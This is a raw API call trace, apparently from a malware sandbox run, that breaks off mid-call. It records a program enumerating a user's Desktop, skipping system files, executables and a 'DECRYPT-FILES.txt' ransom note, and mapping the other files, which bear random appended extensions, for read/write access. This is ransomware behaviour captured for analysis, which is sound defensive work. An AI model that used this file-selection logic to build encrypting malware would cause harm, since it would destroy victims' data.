VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3Evtxg4xh6 tW 9uys.bmp.EGUx8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3evtxg4xh6 tw 9uys.bmp.egux8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.696] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=68448) returned 1 [0184.696] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.696] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.702] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.702] CloseHandle (hObject=0x260) returned 1 [0184.702] CloseHandle (hObject=0x25c) returned 1 [0184.702] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.702] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa499210, ftCreationTime.dwHighDateTime=0x1d4d24d, ftLastAccessTime.dwLowDateTime=0x4a289570, ftLastAccessTime.dwHighDateTime=0x1d4d338, ftLastWriteTime.dwLowDateTime=0xad99b3c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x17c3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5-fWrl.mp3.T9z9h4", cAlternateFileName="5-FWRL~1.T9Z")) returned 1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="DECRYPT-FILES.txt") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="autorun.inf") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="boot.ini") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="desktop.ini") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="ntuser.dat") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="iconcache.db") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="bootsect.bak") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="ntuser.dat.log") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="thumbs.db") returned -1 [0184.702] lstrcmpiW (lpString1="5-fWrl.mp3.T9z9h4", lpString2="Bootfont.bin") returned -1 [0184.702] lstrlenW (lpString="5-fWrl.mp3.T9z9h4") returned 17 [0184.703] lstrcmpiW (lpString1="T9z9h4", lpString2="lnk") returned 1 [0184.703] lstrcmpiW (lpString1="T9z9h4", lpString2="exe") returned 1 [0184.703] lstrcmpiW (lpString1="T9z9h4", lpString2="sys") returned 1 [0184.703] lstrcmpiW (lpString1="T9z9h4", lpString2="dll") returned 1 [0184.703] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.703] lstrlenW (lpString="5-fWrl.mp3.T9z9h4") returned 17 [0184.703] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.703] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="5-fWrl.mp3.T9z9h4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3.T9z9h4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3.T9z9h4" [0184.703] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5-fWrl.mp3.T9z9h4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5-fwrl.mp3.t9z9h4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.703] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=97342) returned 1 [0184.703] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.703] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.704] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.704] CloseHandle (hObject=0x260) returned 1 [0184.704] CloseHandle (hObject=0x25c) returned 1 [0184.704] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.704] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0384670, ftCreationTime.dwHighDateTime=0x1d4cc3a, ftLastAccessTime.dwLowDateTime=0xbb6ab570, ftLastAccessTime.dwHighDateTime=0x1d4c9a0, ftLastWriteTime.dwLowDateTime=0xad9c1520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x166f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="5QUa1fvtx-.m4a.KQqfPS", cAlternateFileName="5QUA1F~1.KQQ")) returned 1 [0184.704] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="DECRYPT-FILES.txt") returned -1 [0184.704] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="autorun.inf") returned -1 [0184.705] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="boot.ini") returned -1 [0184.705] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="desktop.ini") returned -1 [0184.705] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="ntuser.dat") returned -1 [0184.705] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="iconcache.db") returned -1 [0184.705] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="bootsect.bak") returned -1 [0184.705] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="ntuser.dat.log") returned -1 [0184.705] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="thumbs.db") returned -1 [0184.705] lstrcmpiW (lpString1="5QUa1fvtx-.m4a.KQqfPS", lpString2="Bootfont.bin") returned -1 [0184.705] lstrlenW (lpString="5QUa1fvtx-.m4a.KQqfPS") returned 21 [0184.705] lstrcmpiW (lpString1="KQqfPS", lpString2="lnk") returned -1 [0184.705] lstrcmpiW (lpString1="KQqfPS", lpString2="exe") returned 1 [0184.705] lstrcmpiW (lpString1="KQqfPS", lpString2="sys") returned -1 [0184.705] lstrcmpiW (lpString1="KQqfPS", lpString2="dll") returned 1 [0184.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.705] lstrlenW (lpString="5QUa1fvtx-.m4a.KQqfPS") returned 21 [0184.705] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.705] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="5QUa1fvtx-.m4a.KQqfPS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a.KQqfPS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a.KQqfPS" [0184.705] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5QUa1fvtx-.m4a.KQqfPS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5qua1fvtx-.m4a.kqqfps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.705] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=91894) returned 1 [0184.705] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.705] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.706] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.706] CloseHandle (hObject=0x260) returned 1 [0184.706] CloseHandle (hObject=0x25c) returned 1 [0184.706] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.707] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86fce6a0, ftCreationTime.dwHighDateTime=0x1d4d1d4, ftLastAccessTime.dwLowDateTime=0x87683570, ftLastAccessTime.dwHighDateTime=0x1d4cb9b, ftLastWriteTime.dwLowDateTime=0xada0d7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="80E-WR5Nx5kX NM.avi.ZjBc", cAlternateFileName="80E-WR~1.ZJB")) returned 1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="DECRYPT-FILES.txt") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="autorun.inf") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="boot.ini") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="desktop.ini") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="ntuser.dat") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="iconcache.db") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="bootsect.bak") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="ntuser.dat.log") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="thumbs.db") returned -1 [0184.707] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi.ZjBc", lpString2="Bootfont.bin") returned -1 [0184.707] lstrlenW (lpString="80E-WR5Nx5kX NM.avi.ZjBc") returned 24 [0184.707] lstrcmpiW (lpString1="ZjBc", lpString2="lnk") returned 1 [0184.707] lstrcmpiW (lpString1="ZjBc", lpString2="exe") returned 1 [0184.707] lstrcmpiW (lpString1="ZjBc", lpString2="sys") returned 1 [0184.707] lstrcmpiW (lpString1="ZjBc", lpString2="dll") returned 1 [0184.707] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.707] lstrlenW (lpString="80E-WR5Nx5kX NM.avi.ZjBc") returned 24 [0184.707] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.707] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="80E-WR5Nx5kX NM.avi.ZjBc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi.ZjBc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi.ZjBc" [0184.707] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi.ZjBc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\80e-wr5nx5kx nm.avi.zjbc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.707] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=80740) returned 1 [0184.708] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.708] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.708] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.708] CloseHandle (hObject=0x260) returned 1 [0184.708] CloseHandle (hObject=0x25c) returned 1 [0184.708] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.709] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd677710, ftCreationTime.dwHighDateTime=0x1d4c643, ftLastAccessTime.dwLowDateTime=0xb0f3dbb0, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0xada33940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x644d, dwReserved0=0x0, dwReserved1=0x0, cFileName="C99dHX1L.avi.PA3g", cAlternateFileName="C99DHX~1.PA3")) returned 1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="DECRYPT-FILES.txt") returned -1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="autorun.inf") returned 1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="boot.ini") returned 1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="desktop.ini") returned -1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="ntuser.dat") returned -1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="iconcache.db") returned -1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="bootsect.bak") returned 1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="ntuser.dat.log") returned -1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="thumbs.db") returned -1 [0184.709] lstrcmpiW (lpString1="C99dHX1L.avi.PA3g", lpString2="Bootfont.bin") returned 1 [0184.709] lstrlenW (lpString="C99dHX1L.avi.PA3g") returned 17 [0184.709] lstrcmpiW (lpString1="PA3g", lpString2="lnk") returned 1 [0184.709] lstrcmpiW (lpString1="PA3g", lpString2="exe") returned 1 [0184.709] lstrcmpiW (lpString1="PA3g", lpString2="sys") returned -1 [0184.709] lstrcmpiW (lpString1="PA3g", lpString2="dll") returned 1 [0184.709] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.709] lstrlenW (lpString="C99dHX1L.avi.PA3g") returned 17 [0184.709] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.709] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="C99dHX1L.avi.PA3g" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi.PA3g") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi.PA3g" [0184.709] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi.PA3g" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c99dhx1l.avi.pa3g"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.710] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=25677) returned 1 [0184.710] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.710] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.710] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.711] CloseHandle (hObject=0x260) returned 1 [0184.711] CloseHandle (hObject=0x25c) returned 1 [0184.711] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.711] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8dcce0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad8dcce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad8dcce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.711] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.711] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.711] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0184.711] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0184.711] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0184.711] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0184.711] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x861156d0, ftCreationTime.dwHighDateTime=0x1d4d063, ftLastAccessTime.dwLowDateTime=0xfbc827a0, ftLastAccessTime.dwHighDateTime=0x1d4ca50, ftLastWriteTime.dwLowDateTime=0xada59aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xdd0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="emb1rMdXZCT.m4a.jPPRJ", cAlternateFileName="EMB1RM~1.JPP")) returned 1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="DECRYPT-FILES.txt") returned 1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="autorun.inf") returned 1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="boot.ini") returned 1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="desktop.ini") returned 1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="ntuser.dat") returned -1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="iconcache.db") returned -1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="bootsect.bak") returned 1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="ntuser.dat.log") returned -1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="thumbs.db") returned -1 [0184.711] lstrcmpiW (lpString1="emb1rMdXZCT.m4a.jPPRJ", lpString2="Bootfont.bin") returned 1 [0184.711] lstrlenW (lpString="emb1rMdXZCT.m4a.jPPRJ") returned 21 [0184.711] lstrcmpiW (lpString1="jPPRJ", lpString2="lnk") returned -1 [0184.711] lstrcmpiW (lpString1="jPPRJ", lpString2="exe") returned 1 [0184.711] lstrcmpiW (lpString1="jPPRJ", lpString2="sys") returned -1 [0184.711] lstrcmpiW (lpString1="jPPRJ", lpString2="dll") returned 1 [0184.711] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.712] lstrlenW (lpString="emb1rMdXZCT.m4a.jPPRJ") returned 21 [0184.712] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.712] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="emb1rMdXZCT.m4a.jPPRJ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a.jPPRJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a.jPPRJ" [0184.712] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\emb1rMdXZCT.m4a.jPPRJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\emb1rmdxzct.m4a.jpprj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.712] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=56588) returned 1 [0184.712] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.712] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.715] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.716] CloseHandle (hObject=0x260) returned 1 [0184.716] CloseHandle (hObject=0x25c) returned 1 [0184.716] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.716] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829a8000, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x83331680, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x81695300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe53e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eset.exe", cAlternateFileName="")) returned 1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="DECRYPT-FILES.txt") returned 1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="autorun.inf") returned 1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="boot.ini") returned 1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="desktop.ini") returned 1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="ntuser.dat") returned -1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="iconcache.db") returned -1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="bootsect.bak") returned 1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="ntuser.dat.log") returned -1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="thumbs.db") returned -1 [0184.716] lstrcmpiW (lpString1="eset.exe", lpString2="Bootfont.bin") returned 1 [0184.716] lstrlenW (lpString="eset.exe") returned 8 [0184.716] lstrcmpiW (lpString1="exe", lpString2="lnk") returned -1 [0184.716] lstrcmpiW (lpString1="exe", lpString2="exe") returned 0 [0184.716] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34755610, ftCreationTime.dwHighDateTime=0x1d4c879, ftLastAccessTime.dwLowDateTime=0xff15f680, ftLastAccessTime.dwHighDateTime=0x1d4d379, ftLastWriteTime.dwLowDateTime=0xadaa5d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5682, dwReserved0=0x0, dwReserved1=0x0, cFileName="fSI8D5g.pps.z33S0F", cAlternateFileName="FSI8D5~1.Z33")) returned 1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="DECRYPT-FILES.txt") returned 1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="autorun.inf") returned 1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="boot.ini") returned 1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="desktop.ini") returned 1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="ntuser.dat") returned -1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="iconcache.db") returned -1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="bootsect.bak") returned 1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="ntuser.dat.log") returned -1 [0184.716] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="thumbs.db") returned -1 [0184.717] lstrcmpiW (lpString1="fSI8D5g.pps.z33S0F", lpString2="Bootfont.bin") returned 1 [0184.717] lstrlenW (lpString="fSI8D5g.pps.z33S0F") returned 18 [0184.717] lstrcmpiW (lpString1="z33S0F", lpString2="lnk") returned 1 [0184.717] lstrcmpiW (lpString1="z33S0F", lpString2="exe") returned 1 [0184.717] lstrcmpiW (lpString1="z33S0F", lpString2="sys") returned 1 [0184.717] lstrcmpiW (lpString1="z33S0F", lpString2="dll") returned 1 [0184.717] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0184.717] lstrlenW (lpString="fSI8D5g.pps.z33S0F") returned 18 [0184.717] lstrcpyW (in: 